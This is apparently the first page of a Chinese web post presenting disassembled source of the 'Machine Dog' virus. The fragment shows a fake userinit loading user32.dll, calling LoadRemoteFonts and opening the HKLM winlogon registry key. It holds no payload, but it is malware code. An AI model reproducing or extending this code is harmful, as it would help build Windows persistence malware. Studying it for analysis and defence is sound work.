| 机器狗病毒入侵源码
0040045A > $ 55 push ebp ; (初始 cpu 选择)
0040045B . 8BEC mov ebp,esp
0040045D . 81C4 E8FEFFFF add esp,-118
00400463 . 68 9C0A4000 push userinIT.00400A9C ; /user32.dll
00400468 . E8 55020000 call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
0040046D . 0BC0 or eax,eax
0040046F . 74 11 je short userinIT.00400482
00400471 . 68 A70A4000 push userinIT.00400AA7 ; /loadremotefonts
00400476 . 50 push eax ; |hModule
00400477 . E8 34020000 call <jmp.&kernel32.GetProcAddress> ; \GetProcAddress
0040047C . 0BC0 or eax,eax
0040047E . 74 02 je short userinIT.00400482
00400480 . FFD0 call eax ; USER32.LoadRemoteFonts
00400482 > 8D45 FC lea eax,dword ptr ss:[ebp-4]
00400485 . 50 push eax ; /pHandle
00400486 . 68 19000200 push 20019 ; |Access = KEY_READ
0040048B . 6A 00 push 0 ; |Reserved = 0
0040048D . 68 B70A4000 push userinIT.00400AB7 ; |software\microsoft\windows nt\currentversion\winlogon
00400492 . 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00400497 . E8 5C020000 call <jmp.&advapi32.RegOpenKeyExA> ; \RegOpenKeyExA
0040049C . 0BC0 or eax,eax //打开注册表检测winlogon键值
0040049E . 75 48 jnz short userinIT.004004E8
004004A0 . C745 F8 04010000 mov dword ptr ss:[ebp-8],104
004004A7 . 68 04010000 push 104 ; /Length = 104 (260.)
004004AC . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; |
[1] [2] [3] [4] [5] 下一页
|
